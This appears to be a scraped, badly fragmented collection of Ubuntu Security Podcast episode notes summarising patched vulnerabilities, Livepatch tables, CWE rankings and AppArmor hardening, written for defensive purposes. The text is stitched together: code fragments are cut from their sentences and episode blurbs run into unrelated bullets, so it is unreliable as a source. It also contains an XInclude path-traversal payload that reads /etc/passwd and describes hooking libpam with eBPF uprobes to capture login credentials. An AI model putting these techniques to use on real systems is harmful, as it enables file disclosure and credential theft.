generic-4.4 | — | — | — | 100.1 | 100.1 |
generic-5.15 | — | 100.1 | — | — | — |
generic-5.4 | — | 100.1 | 100.1 | — | — |
gke | 100.1 | 100.1 | — | — | — |
gke-5.15 | — | 100.1 | — | — | — |
gkeop | — | 100.1 | — | — | — |
hwe-6.2 | 100.1 | — | — | — | — |
ibm | 100.1 | 100.1 | — | — | — |
ibm-5.15 | — | 100.1 | — | — | — |
linux | 100.1 | — | — | — | — |
lowlatency-4.15 | — | — | 100.1 | 100.1 | — |
lowlatency-4.4 | — | — | — | 100.1 | 100.1 |
lowlatency-5.15 | — | 100.1 | — | — | — |
lowlatency-5.4 | — | 100.1 | 100.1 | — | — |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
access_key
if logging configured at DEBUG level - any
user then able to read the logs could see the access key and hence potentially
get access to the S3 bucket (would also need the secret key too and this was
never logged so impact minimal)Earlier this week, Greg Kroah-Hartman (one of the more famous Linux kernel developers - responsible for the various stable kernel trees / releases plus various subsystems within the kernel - also wrote one of the most popular books on Linux Kernel Driver development - even if it is woefully outdated nowadays) announced that the Linux kernel project itself has been accepted as a CNA by MITRE and would start issues CVEs for the vulnerabilities found within the kernel itself
Historically the upstream kernel developers and Greg himself have been quite disparaging of the CVE process / ecosystem and essentially saying that CVEs for the kernel are meaningless since that all bugs are potentially security issues and there are so many fixes that go into the kernel of which the security impact is not clear, that the only way to stay secure is to track one of the supported upstream stable kernel trees - otherwise CVEs would be issued for basically every commit that goes into one of the stable trees
It was not then surprising to see that in the initial announcement there was a statement that:
Note, due to the layer at which the Linux kernel is in a system, almost any bug might be exploitable to compromise the security of the kernel, but the possibility of exploitation is often not evident when the bug is fixed. Because of this, the CVE assignment team is overly cautious and assign CVE numbers to any bugfix that they identify.
This led many (including us) to fear that the kernel CNA would be issuing an extremely high volume of CVEs which would effectively overwhelm the CVE process and make it unworkable - for instance, LWN calculated that for the 6.1 stable kernel has had over 12,000 fixes applied to it over the past year. So this leaves a huge scope for many CVEs to be possibly assigned - and as a comparison in total across all software / hardware devices etc in 2023 there was 29,000 CVEs assigned. So that could mean the kernel itself would possibly become responsible for at least a quarter of all CVEs in the future.
Greg has some prior form in this space as well since in 2019 he gave a talk where he suggested one way the kernel community could help fix the issue of CVEs being erroneously assigned against the kernel would be to start doing exactly this and assigning a CVE for every fix applied to the kernel and hence overwhelm the CVE ecosystem to (in his words) “burn it down”.
Also the GSD project (Global Security Database - set up as an alternate / competitor to CVE) was doing exactly this - tracking a huge number of fixes for the stable trees and assigning them GSD IDs - as per https://osv.dev/list?ecosystem=Linux it tracks 13573 issues
Thankfully though, this plan seems to have moderated over the past few days - after Greg posted a patch set to the LKML documenting the process, he clarified in a follow-up email that this would not be the case, and instead that CVEs will only be assigned for commits which appear to have a security relevant impact. How they actually do that remains to be seen, and his comment that “we (will) know it when we see it” doesn’t exactly put me at ease (since it is very easy to miss the security implications of any particular commit) at least this helps allay the fears that there would be a tidal wave of CVEs being assigned.
One outstanding issue which I directly asked Greg about is how they are actually tracking fixes for CVEs - since in their model, a CVE is equivalent to the commit which fixes the issue - however for lots of existing kernel CVEs that get assigned by other CNAs like Canonical or Red Hat etc, the fix comprises multiple commits
Greg says the whole process is quite complex and whilst their existing scripts want a one-to-one mapping from CVEs to commits they do plan to fix this in the future.
So will be interesting to see what things they will end up assigning CVEs. Also will be interesting to see how the interaction with security researchers plays out. Since their process is heavily skewed to the CVE corresponding to the fix commit AND they state that this must be in one of the stable trees for a CVE to be assigned, it doesn’t leave a lot of room for responsible disclosure. They do say they can assign a CVE for an issue before it is resolved with a commit to one of the stable trees, but ideally these details would get disclosed to distros and others ahead of the CVE details being released to the public. I also asked Greg about this but am awaiting a response.
AppArmor unprivileged user namespace restrictions are back on the agenda this week as we survey the latest improvements to this hardening feature in the upcoming Ubuntu 24.04 LTS, plus we discuss SMTP smuggling in Postfix, runC container escapes and Qualys’ recent disclosure of a privilege escalation exploit for GNU libc and more.
39 unique CVEs addressed
<CR><LF>.<CR><LF>
gets interpreted loosely so that it is possible to include
extra SMTP commands within the message data which would then go on to be
interpreted as an additional SMTP commands to be executed by the receiving
server and to cause it to receive two emails when only one was sent in the
first place, and where the usual SPF checks get bypassed for this second
email - so can bypass SPF/DMARC policies to spoof emails from various
domainssyslog()
system callargv[0]
in a call to snprintf() into a fixed size buffer
allocated on the stack - snprintf() won’t overflow this but will return a
value larger than the fixed size buffer - as a result a heap buffer to then
contain this string would only get allocated with a size of 1 byte but then
the full expected data would get copied into it - and since the attacker
controls this value they can write arbitrary data to the heap by just using
a crafted program name (which is easy to do via the the exec
command built
in to bash etc)/usr/bin/su
call syslog()
internally and so can
be abused in this wayintcomma
templateCAP_NET_ADMIN
within that namespace and so create firewall rules etc that only
affect applications within that namespace and not the host system
CAP_NET_ADMIN
etc as mentioned before) this is then deniedapparmor
package in noble-proposed pocket
For the first episode of 2024 we take a look at the case of a raft of bogus FOSS CVEs reported on full-disclosure as well as AppSec tools in Ubuntu and the EOL announcement for 23.04, plus we cover vulnerabilities in the Linux kernel, Puma, Paramiko and more.
81 unique CVEs addressed
CAP_NET_ADMIN
to be able to
exploit (ie to create a netfilter chain etc) but this can easily be obtained
in an unprivileged user namespace -> privesc for unprivileged local userEXT_INFO
message which is sent during the handshake to negotiate various
protocol extensions in a way that neither the client or server will notice
(since they can just send an empty ignored packet with the same sequence
number). This can be done quite easily by an attacker since during this stage
of the connection there is no encryption in place. End result is the attacker
can cause either a loss of integrity (since this won’t be detected by the
other party) or potentially to compromise the key exchange itself and hence
cause a loss of confidentiality as wellFor the final episode of 2023 we discuss creating PoCs for vulns in tar and the looming EOL for Ubuntu 23.04, plus we look into security updates for curl, BlueZ, Netatalk, GNOME Settings and a heap more.
57 unique CVEs addressed
.com
/ .org
but also .co.uk
etc - since there is no good algorithmic way of determining the highest level
at which a domain may be registered for a particular TLD as each registrar is
different
domain=co.UK
with a URL of say curl.co.uk
and
this would then get sent to every other .co.uk
domain contrary to the
expectations of the PSL which lists .co.uk
as a PSL domainvmware-user-suid
wrapper - a
local user with non-root privileges that is able to hijack the /dev/uinput
file descriptor may be able to simulate user inputsClassicBondedOnly=true
- this may
break some legacy input devices like PS3 controller - in which case, should
edit /etc/bluetooth/input.conf
and set this back to false
but then beware that
you may be vulnerable to attack from anyone within bluetooth range when your
machines is discoverable - ie. bluetooth settings panel is opengetaddrinfo()
-
possible to still trigger1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
Stack buffer overflow on parsing a tar archive with an extremely large
extended attribute name/value - PAX
archive format allows to store extended
attributes - on the kernel’s VFS layer these are limited to 255 bytes for the
name and 64kB for the value - but in a tar these can be basically arbitrary
When processing the archive, tar would allocate space for these on the stack - BUT the stack is limited to a maximum size of 8MB normally - so if can specify an xattr name of more than 8MB can overflow the entire stack memory region - then into guard pages or even beyond, triggering a segfault or at worst a heap corruption and hence possible RCE -> but in Ubuntu we have enabled stack clash protection since 19.10 - which turns this into a DoS only
$ hardening-check $(which tar)
/usr/bin/tar:
Position Independent Executable: yes
Stack protected: yes
Fortify Source functions: yes (some protected functions found)
Read-only relocations: yes
Immediate binding: yes
Stack clash protection: yes
Control flow integrity: yes
Speaking from experience, it is not easy to create such an archive - either through a real xattr on disk or through specifying one on the command-line (since you can specify arbitrary attributes be stored for files when adding them to an archive but then you hit the maximum limit of command-line arguments) BUT it is possible - in my case I did this though using sed to replace the contents of a xattr name in an existing archive with a crafted one and then doing a bunch of other hacks to fixup all the metadata of the tar archive to match - helpfully, all these attributes in the archive are stored as NUL-terminated strings, so can simply used sed to fix them all up assuming you can calculate the correct values
Fixed by instead allocating these on the heap which does not have the same arbitrary limitation as the stack
objdump
etcos.path.normpath()
it would get truncated at the NUL byte -
fixed to remove this behaviourMark Esler is our special guest on the podcast this week to discuss the OpenSSF’s Compiler Options Hardening Guide for C/C++ plus we cover vulnerabilities and updates for GIMP, FreeRDP, GStreamer, HAProxy and more.
65 unique CVEs addressed
index.html#.png
to a static server (since usually is configured
to route .png
to a static server, but in this case the request is really for
index.html
)This week we take a deep dive into the Reptar vuln in Intel processors plus we look into some relic vulnerabilities in Squid and OpenZFS and finally we detail new hardening measures in tracker-miners to keep your desktop safer.
115 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | 99.2 | 99.1 | 99.1 | 99.1 | — |
aws-5.15 | — | 99.2 | — | — | — |
aws-5.4 | — | — | 99.1 | — | — |
aws-6.2 | 99.2 | — | — | — | — |
aws-hwe | — | — | — | 99.1 | — |
azure | 99.2 | 99.1 | — | 99.1 | — |
azure-4.15 | — | — | 99.1 | — | — |
azure-5.4 | — | — | 99.1 | — | — |
azure-6.2 | 99.2 | — | — | — | — |
gcp | 99.2 | 99.1 | — | 99.1 | — |
gcp-4.15 | — | — | 99.1 | — | — |
gcp-5.15 | — | 99.2 | — | — | — |
gcp-5.4 | — | — | 99.1 | — | — |
gcp-6.2 | 99.2 | — | — | — | — |
generic-4.15 | — | — | 99.1 | 99.1 | — |
generic-4.4 | — | — | — | 99.1 | 99.1 |
generic-5.15 | — | 99.2 | — | — | — |
generic-5.4 | — | 99.1 | 99.1 | — | — |
gke | 99.2 | 99.1 | — | — | — |
gke-5.15 | — | 99.2 | — | — | — |
gkeop | — | 99.1 | — | — | — |
hwe-6.2 | 99.2 | — | — | — | — |
ibm | 99.2 | 99.1 | — | — | — |
ibm-5.15 | — | 99.2 | — | — | — |
ibm-5.4 | — | — | 99.1 | — | — |
linux | 99.2 | — | — | — | — |
lowlatency-4.15 | — | — | 99.1 | 99.1 | — |
lowlatency-4.4 | — | — | — | 99.1 | 99.1 |
lowlatency-5.15 | — | 99.2 | — | — | — |
lowlatency-5.4 | — | 99.1 | 99.1 | — | — |
canonical-livepatch status
As we ease back into regular programming, we cover the various activities the team got up to over the past few weeks whilst away in Riga for the Ubuntu Summit and Ubuntu Engineering Sprint.
With the Ubuntu Summit just around the corner, we preview a couple talks by the Ubuntu Security team, plus we look at security updates for OpenSSL, Sofia-SIP, AOM, ncurses, the Linux kernel and more.
91 unique CVEs addressed
p
parameter) value (over 10,000 bits)p
value
and hence take an excessive amount of time - fixed by checking this earlier
and erroring out in that caseq
parameter could also be abused in the same way -
since the size of this has to be less than p
was fixed by just checking it
against thisinfotocap
After a well-deserved break, we’re is back looking at the recent Ubuntu 23.10 release and the significant security technologies it introduces along with a call for testing of unprivileged user namespace restrictions, plus the details of security updates for curl, Samba, iperf3, CUE and more.
26 unique CVEs addressed
curl_easy_duphandle()
function%U
directive in smb.conf - if specified a path to be shared
like /home/%U/FILES
the %U
would seemingly be ignored and not replaced with
the username as expected - and hence the share would fail - this same issue
actually occurred previously in January this year - have now added a
regression test specifically to try and ensure we do not introduce this same
issue in the future againMAX_UINT
adding 1 then wraps the integer
around back to zero - and so no memory gets allocated - and when copying into
the subsequent memory get a buffer overflowThe hope is to get this enabled by default in 24.04 LTS - but we need as much testing as we can get to find anything else which is not working as expected beforehand - easy to do via a new sysctl
sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=1
/etc/sysctl.d
, e.g.:
create a file /etc/sysctl.d/60-apparmor.conf
with the following contents:kernel.apparmor_restrict_unprivileged_userns = 1
Then if you do find something which is not working as expected, you can create a simple AppArmor profile which will allow it to use unprivileged user namespaces without any additional restrictions, e.g:
abi <abi/4.0>,
include <tunables/global>
/opt/google/chrome/chrome flags=(unconfined) {
userns,
# Site-specific additions and overrides. See local/README for details.
include if exists <local/opt.google.chrome.chrome>
}
aa-exec
‘ing themselves via that profile - so then also need
to enable the kernel.apparmor_restrict_unprivileged_unconfined = 1
sysctl tooubuntu-bug apparmor
or visit
https://bugs.launchpad.net/ubuntu/+source/apparmor/+filebugIt’s the Linux Security Summit in Bilbao this week and we bring you some highlights from our favourite talks, plus we cover the 25 most stubborn software weaknesses, and we look at security updates for Open VM Tools, libwebp, Django, binutils, Indent, the Linux kernel and more.
88 unique CVEs addressed
CREATE
to being able to execute arbitrary code as a bootstrap superuser)
also affected PostgreSQL 9.5 in Ubuntu 16.04.xll
files from standard blocklist that warns users when downloading
executables - more of a windows issue but these are Excel add-in files -
ie. plugins for Excel, “memory safety bugs”FILES_TMP_CONTENT
variableatftpd
if requesting a non-existant file - turns out to be a
buffer overflow so could possibly be used for code executionCWE-ID | Description | 2023 Rank |
---|---|---|
CWE-787 | Out-of-bounds Write | 1 |
CWE-79 | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) | 2 |
CWE-89 | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) | 3 |
CWE-416 | Use After Free | 4 |
CWE-78 | Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) | 5 |
CWE-20 | Improper Input Validation | 6 |
CWE-125 | Out-of-bounds Read | 7 |
CWE-22 | Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) | 8 |
CWE-352 | Cross-Site Request Forgery (CSRF) | 9 |
CWE-476 | NULL Pointer Dereference | 12 |
CWE-287 | Improper Authentication | 13 |
CWE-190 | Integer Overflow or Wraparound | 14 |
CWE-502 | Deserialization of Untrusted Data | 15 |
CWE-119 | Improper Restriction of Operations within Bounds of a Memory Buffer | 17 |
CWE-798 | Use of Hard-coded Credentials | 18 |
Andrei is back this week with a deep dive into recent research around CVSS scoring inconsistencies, plus we look at a recent Ubuntu blog post on the internals of package updates and the repositories, and we cover security updates in Apache Shiro, GRUB2, CUPS, RedCloth, curl and more.
77 unique CVEs addressed
CUPS-Get-Document
operation - could allow other users to fetch print documents
without authentication“Shedding Light on CVSS Scoring Inconsistencies: A User-Centric Study on Evaluating Widespread Security Vulnerabilities” - to appear in IEEE Symposium on Security & Privacy (aka S&P) in 2024
This week we detail the recently announced and long-awaited feature of TPM-backed full-disk encryption for the upcoming Ubuntu 23.10 release, plus we cover security updates for elfutils, GitPython, atftp, BusyBox, Docker Registry and more.
93 unique CVEs addressed
git clone
and doesn’t completely
validate the options and so leads to shell-command injection - thanks to
Sylvain Beucler from Debian LTS team for noticing this and pointing it out to
the upstream project/etc/group
on the server but likely this is not
deterministic and would be whatever else was on the heapfree()
on malformed gzip data - on error, sets bit 1 of a pointer to
indicate that an error occurred - would then go and pass this pointer to
free()
but now the pointer is 1-byte past where it should be - so need to
unset this bit firstsnap recovery --show-keys
emergency.service
unit is still enabled which
allows the usual boot checks to be bypassedThis week we cover reports of “fake” CVEs and their impact on the FOSS security ecosystem, plus we look at security updates for PHP, Fast DDS, JOSE for C/C++, the Linux kernel, AMD Microcode and more.
83 unique CVEs addressed
clearcpuid=avx
on the kernel
command-line (but this will have a decent performance impact)--retry-delay
command-line option - where
if you specify a really large value of seconds, cURL will multiply this by
1000 to convert it to ms and hence overflow
This week we talk about HTTP Content-Length handling, intricacies of group management in container environments and making sure you check your return codes while covering vulns in HAProxy, Podman, Inetutils and more, plus we put a call out for input on using open source tools to secure your SDLC.
69 unique CVEs addressed
Content-Length
headers even when there was
content in the request (which violates
RFC 9110 - HTTP Semantics) - this
RFC explicitly says:If the message is forwarded by a downstream intermediary, a Content-Length field value that is inconsistent with the received message framing might cause a security failure due to request smuggling or response splitting. As a result, a sender MUST NOT forward a message with a Content-Length header field value that is known to be incorrect.
ubuntu@ubuntu:~$ groups
ubuntu sudo
pdftops
binarysetuid()=/=setgid()
system calls
used in ftpd/rshd/rlogin etc
We’re back after unexpectedly going AWOL last week to bring you the latest in Ubuntu Security including the recently announced Downfall and GameOver(lay) vulnerabilities, plus we look at security updates for OpenSSH and GStreamer and we detail plans for using AppArmor to restrict the use of unprivileged user namespaces as an attack vector in future Ubuntu releases.
143 unique CVEs addressed
14 CVEs addressed in Jammy (22.04 LTS)
6.1 kernel
8 different high priority vulns - most mentioned previously - does include “GameOver(lay)” which we haven’t covered yet - reported by WizResearch and is specific to Ubuntu kernels
OverlayFS is a union filesystem which allows multiple filesystems to be mounted at the same time, and presents a single unified view of the filesystems. In 2018 we introduced some changes to OverlayFS as SAUCE patches to handle extended attributes in overlayfs. Then in 2020 we backported commits to fix CVE-2021-3493 - in the process this also added support for extended attributes in OverlayFS so now there were two code paths, each using different implementations for extended attributes. One was protected against the vuln in CVE-2021-3493 whilst the other was not.
This vulnerability is exploiting that same vulnerability in the unprotected implementation.
In this case, the vulnerability is in the handling of extended attributes in OverlayFS - the vulnerability is that it is possible to create a file with extended attributes which are not visible to the user, and then mount that file in a way which allows the extended attributes to be visible to the user
nosuid
option, and thenremounting it with suid
option. This allows the user to then execute arbitrary
code as root. NOTE: requires the user to have the ability to have
CAP_SYS_ADMIN
but this is easy with unprivileged user namespaces.
Even more reason to keep pursuing the effort to restrict the use of unprivileged user namespaces in upcoming Ubuntu 23.10
gather_data_sampling=off
- this is useful for those who want to avoid the
performance hit, and are willing to accept the risk of the vulnerability.This week we look at the recent Zenbleed vulnerability affecting some AMD processors, plus we cover security updates for the Linux kernel, a high profile OpenSSH vulnerability and finally Andrei is back with a deep dive into recent academic research around how to safeguard machine learning systems when used across distributed deployments.
123 unique CVEs addressed
/usr/lib
on
your local machine
ssh
wrmsr -a 0xc0011029 $(($(rdmsr -c 0xc0011029) | (1<<9)))
CAP_NET_ADMIN
to exploit - but can get this in an
unprivileged user namespace -> privescKernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | — | 96.2 | — | 96.2 | — |
aws-hwe | — | — | — | 96.2 | — |
azure | 96.3 | 96.2 | — | 96.2 | — |
azure-5.4 | — | — | 96.2 | — | — |
gcp | 96.3 | 96.2 | — | 96.2 | — |
gcp-4.15 | — | — | 96.2 | — | — |
gcp-5.15 | — | 96.3 | — | — | — |
gcp-5.4 | — | — | 96.2 | — | — |
generic-4.15 | — | — | 96.2 | 96.2 | — |
generic-4.4 | — | — | — | 96.2 | 96.2 |
generic-5.15 | — | 96.3 | — | — | — |
generic-5.4 | — | 96.2 | 96.2 | — | — |
gke | 96.3 | 96.2 | — | — | — |
gke-5.15 | — | 96.3 | — | — | — |
gke-5.4 | — | — | 96.2 | — | — |
gkeop | — | 96.2 | — | — | — |
gkeop-5.4 | — | — | 96.2 | — | — |
ibm | 96.3 | 96.2 | — | — | — |
ibm-5.4 | — | — | 96.2 | — | — |
linux | 96.3 | — | — | — | — |
lowlatency-4.15 | — | — | 96.2 | 96.2 | — |
lowlatency-4.4 | — | — | — | 96.2 | 96.2 |
lowlatency-5.15 | — | 96.3 | — | — | — |
lowlatency-5.4 | — | 96.2 | 96.2 | — | — |
include
element that specifies say <xi:include href=”.?../../../../../../../../../../etc/passwd”/>
- simple PoC provided by
the upstream reporterThis week we talk about the dual use purposes of eBPF - both for security and for exploitation, and how you can keep your systems safe, plus we cover security updates for the Linux kernel, Ruby, SciPy, YAJL, ConnMan, curl and more.
80 unique CVEs addressed
io_uring
x*
as punycode names always start with xn--
/sys/kernel/debug/tracing/uprobe_events
but once done, allows to then
have a BPF program executed every time the specified function within a
specified library / binary is executed - so by hooking libpam can then log the
credentials used by any user when logging in / authenticating for sudo etc.LD_PRELOAD
to hook into
the functions - but this requires that binaries get executed with this
environment set so is harder to achieve.text
section) to look for breakpoint opcode (0xCC
) or
it could look for the special memory mapping [uprobes]
in /proc/self/maps
/sys/kernel/debug/tracing/uprobe_events
-
which lists all the uretprobes currently in use on the systemWe take a sneak peek at the upcoming AppArmor 4.0 release, plus we cover vulnerabilities in AccountsService, the Linux Kernel, ReportLab, GNU Screen, containerd and more.
50 unique CVEs addressed
~/.pam_environment
file
which is used to configure various per-user session environment variables -
this way no matter how you log in to a Ubuntu system, the locale etc that you
configured via g-c-c etc gets usedio_uring
subsystem - local attacker could use
this to trigger a deadlock and hence a DoSINVLPG
instruction - but it was found that on certain hardware platforms this did not
actually flush the global TLB contrary to expectation - and so could leak
kernel memory back to userspaceio_uring
and TC flower plus OOB read in InfiniBand RDMA driver - DoS / info
leakeval()
function
directly on value obtained from an XML documenteval()
without having to remove this functionality - new update disables this
by default and instead only allows a much limited subset of colors to be
parsedapparmor_parser
This week we look at the top 25 most dangerous vulnerability types, as well as the announcement of the program for LSS EU, and we cover security updates for Bind, the Linux kernel, CUPS, etcd and more.
36 unique CVEs addressed
warn
or higher -
could then either cause a crash (SEGV etc) or could potentially end up logging
sensitive info if that was then present in that memory locationRank | ID | Name | Score | CVEs in KEV |
---|---|---|---|---|
1 | CWE-787 | Out-of-bounds Write | 63.72 | 70 |
2 | CWE-79 | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) | 45.54 | 4 |
3 | CWE-89 | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) | 34.27 | 6 |
4 | CWE-416 | Use After Free | 16.71 | 44 |
5 | CWE-78 | Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) | 15.65 | 23 |
6 | CWE-20 | Improper Input Validation | 15.50 | 35 |
7 | CWE-125 | Out-of-bounds Read | 14.60 | 2 |
8 | CWE-22 | Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) | 14.11 | 16 |
9 | CWE-352 | Cross-Site Request Forgery (CSRF) | 11.73 | 0 |
10 | CWE-434 | Unrestricted Upload of File with Dangerous Type | 10.41 | 5 |
11 | CWE-862 | Missing Authorization | 6.90 | 0 |
12 | CWE-476 | NULL Pointer Dereference | 6.59 | 0 |
13 | CWE-287 | Improper Authentication | 6.39 | 10 |
14 | CWE-190 | Integer Overflow or Wraparound | 5.89 | 4 |
15 | CWE-502 | Deserialization of Untrusted Data | 5.56 | 14 |
16 | CWE-77 | Improper Neutralization of Special Elements used in a Command (‘Command Injection’) | 4.95 | 4 |
17 | CWE-119 | Improper Restriction of Operations within the Bounds of a Memory Buffer | 4.75 | 7 |
18 | CWE-798 | Use of Hard-coded Credentials | 4.57 | 2 |
19 | CWE-918 | Server-Side Request Forgery (SSRF) | 4.56 | 16 |
20 | CWE-306 | Missing Authentication for Critical Function | 3.78 | 8 |
21 | CWE-362 | Concurrent Execution using Shared Resource with Improper Synchronization (‘Race Condition’) | 3.53 | 8 |
22 | CWE-269 | Improper Privilege Management | 3.31 | 5 |
23 | CWE-94 | Improper Control of Generation of Code (‘Code Injection’) | 3.30 | 6 |
24 | CWE-863 | Incorrect Authorization | 3.16 | 0 |
25 | CWE-276 | Incorrect Default Permissions | 3.16 | 0 |
For our 200th episode, we discuss the impact of Red Hat’s decision to stop publicly releasing the RHEL source code, plus we cover security updates for libX11, GNU SASL, QEMU, VLC, pngcheck, the Linux kernel and a whole lot more.
73 unique CVEs addressed
PTcrop
utility which could be abused to execute arbitrary code etcapt upgrade
or use
unattended-upgrades
to install security updates as this will upgrade all
installed binary packages to all the newer versions, and not say just apt install sssd
which would only pull in some of the binary packagespodman play kube
to create containers / pods / volumes based on a
k8s yaml, it would always pull in the k8s.gcr.io/pause
image - this is not
necessary and it not necessarily maintained and so could present a security
issue as a result7 CVEs addressed in Jammy (22.04 LTS)
6.1 OEM
OOB read in the USB handling code for Broadcom FullMAC USB WiFi driver
your machine to be able to trigger (shout out to USBGuard)
OOB write in network queuing scheduler
Kernel type | 22.04 | 20.04 | 18.04 |
---|---|---|---|
aws | 95.4 | 95.4 | — |
aws-5.15 | — | 95.4 | — |
aws-5.4 | — | — | 95.4 |
azure | 95.4 | 95.4 | — |
azure-5.4 | — | — | 95.4 |
gcp | 95.4 | 95.4 | — |
gcp-5.15 | — | 95.4 | — |
gcp-5.4 | — | — | 95.4 |
generic-5.4 | — | 95.4 | 95.4 |
gke | 95.4 | 95.4 | — |
gke-5.15 | — | 95.4 | — |
gke-5.4 | — | — | 95.4 |
gkeop | — | 95.4 | — |
gkeop-5.4 | — | — | 95.4 |
ibm | 95.4 | 95.4 | — |
ibm-5.4 | — | — | 95.4 |
linux | 95.4 | — | — |
lowlatency | 95.1 | — | — |
lowlatency-5.4 | — | 95.4 | 95.4 |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
For our 199th episode Andrei looks at Fuzzing Configurations of Program Options
plus we discuss Google’s findings on the io_uring
kernel subsystem and we look
at vulnerability fixes for Netatalk, Jupyter Core, Vim, SSSD, GNU binutils, GLib
and more.
53 unique CVEs addressed
Subject DN
field - this
would then be used directly in the query and would be interpreted as
parameters in the LDAP query - could then allow a malicious client to provide
a crafted certificate which performs arbitrary LDAP queries etc - such that
when used in conjunction with FreeIPA they could elevate their privilegesio_uring
in ChromeOS and their production servers (12:00)io_uring
- with around
$1m USD rewarded for io_uring
submissions alone - and io_uring
was used in all
submissions which bypassed their mitigations
io_uring
in ChromeOS (was originally enabled back in
November 2022 to increase performance of their arcvm
which is used to run
Android apps on ChromeOS) but then now disabled 4 months later in Feb this
yeario_uring
to Android applications and in the
future will also use SELinux to restrict access even further to only select
system processesio_uring
on their production serversio_uring
and ongoing development of features
for it, it presents too much of a risk for use by untrusted applications etcThis week we investigate the mystery of failing GPG signatures for the 16.04 ISO images, plus we look at security updates for CUPS, Avahi, the Linux kernel, FRR, Go and more.
58 unique CVEs addressed
cupsd.conf
to have LogLevel
as debug
which is not usually the caseCPAN
and HTTP::Tiny
`
for JS
etc)xdg-open
- so could
call xdg-open
with crafted input that would then get passed through to
whatever application (like say the browser / file manager etc) and hence could
run these other applications with arbitrary arguments - e.g. could embed a
link in a PDF and when the user clicks this can then get say the browser to be
launched with arbitrary arguments--remote-allow-origins
flag to specify an attacker
controlled domain which is then allowed to connect to the local debugging port
and hence execute arbitrary JS on any other domain - steal creds etcSETTINGS
frames would cause a CPU-based DoS - mitigated by
setting a max limit for these frame types and rejecting if too largeapt
) we take a hash of the ISO
file and then sign the file containing that list of hashes - for performanceSHA256SUMS
file has been modified
and so does not validate properly/usr/share/keyrings/ubuntu-archive-keyring.gpg
file from the ubuntu-keyring
packagewget -q https://old-releases.ubuntu.com/releases/xenial/SHA256SUMS{,.gpg}
gpg --verify --no-default-keyring --keyring=/usr/share/keyrings/ubuntu-archive-keyring.gpg --verbose SHA256SUMS.gpg SHA256SUMS
gpg: Signature made Fri 01 Mar 2019 02:56:07 ACDT
gpg: using DSA key 46181433FBB75451
gpg: Can't check signature: No public key
gpg: Signature made Fri 01 Mar 2019 02:56:07 ACDT
gpg: using RSA key D94AA3F0EFE21092
gpg: using pgp trust model
gpg: BAD signature from "Ubuntu CD Image Automatic Signing Key (2012) <[email protected]>" [unknown]
gpg: binary signature, digest algorithm SHA512, key algorithm rsa4096
SHA256SUMS
file was modifiedvorlon
from Foundations confirmed this was the casegpg: Signature made Fri 09 Jun 2023 00:38:30 ACST
gpg: using RSA key 843938DF228D22F7B3742BC0D94AA3F0EFE21092
gpg: using pgp trust model
gpg: Good signature from "Ubuntu CD Image Automatic Signing Key (2012) <[email protected]>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 8439 38DF 228D 22F7 B374 2BC0 D94A A3F0 EFE2 1092
gpg: binary signature, digest algorithm SHA512, key algorithm rsa4096
The venerable Ubuntu 18.04 LTS release has transitioned into ESM, plus we look at Till Kamppeter’s excellent guide on how to set up your GitHub projects to receive private vulnerability reports, and we cover the week in security updates including PostgreSQL, Jhead, the Linux kernel, Linux PTP, snapd and a whole lot more.
56 unique CVEs addressed
CREATE
privileges - could then allow an auth user to execute arbitrary code as
a the bootstrap supervisor - the other in row security properties which could
allow to bypass policies and get read/write contrary to security policy.CAP_NET_ADMIN
but can get this in an unprivileged user namespace ∴
can be triggered OOTB by an unpriv user on UbuntuVary:Cookie
header - requires the use of a caching proxy
and other conditions though so may not be a widespread issuessl_Verify
- parameter to
<:Tiny>nth-child()
and nth-last-of-type()
functions) - can pass it a string and it
will compile that to an optimised function for calling by other codefree()
or realloc()
on crafted messages - both only really an issue if parsing untrusted contentTIOCLINUX
ioctl()
request - could allow a snap to inject contents into the
controlling terminal when run on a virtual console - this would then be
executed when the snap finished running -> code exec outside the snap sandboxTIOCLINUX
as it already did for TIOCSTI
in the pastTIOCSTI
CVEs such as CVE-2016-9016 in firejail,
CVE-2016-10124 in lxc, CVE-2017-5226 in bubblewrap, CVE-2019-10063 in flatpakThis week we look at some recent security developments from PyPI, the Linux Security Summit North America and the pending transition of Ubuntu 18.04 to ESM, plus we cover security updates for cups-filter, the Linux kernel, Git, runC, ncurses, cloud-init and more.
83 unique CVEs addressed
system()
to run a command
which contained various values that can be controlled by the attackerfork()
and execve()
plus some other smaller changes
to perform sanitisation of the input.gitmodules
file with submodule URLs longer than 1024
chars - could inject arbitrary config into the users git config - eg. could
configure the pager or editor etc to run some arbitrary commandgit apply --reject
TERMINFO
of though ~/.terminfo
- will
get used by a setuid
binary as well - turns out though that ncurses has a
build-time configuration option to disable the use of custom terminfo/termcap
when running - fixed this by enabling thatSecuring PyPI accounts via Two-Factor Authentication
Alex and Camila discuss security update management strategies after a recent outage at Datadog was attributed to a security update for systemd on Ubuntu, plus we look at security vulnerabilities in the Linux kernel, OpenStack, Synapse, OpenJDK and more.
66 unique CVEs addressed
io_uring
io_uring
, logic issue in OverlayFS
([USN-6057-1] Linux kernel
(Intel IoTG) vulnerabilities from Episode 194), race-condition in handling
of handling of copy-on-write read-only shared memory mappings - unpriv user
could then get write on these read-only mappings -> privescio_uring
, logic issue in OverlayFSThe team are back from Prague and bring with them a new segment, drilling into recent academic research in the cybersecurity space - for this inaugural segment new team member Andrei looks at modelling of attacks against network intrusion detections systems, plus we cover the week in security updates looking at vulnerabilities in Django, Ruby, Linux kernel, Erlang, OpenStack and more.
57 unique CVEs addressed
'{verify, verify_peer}'
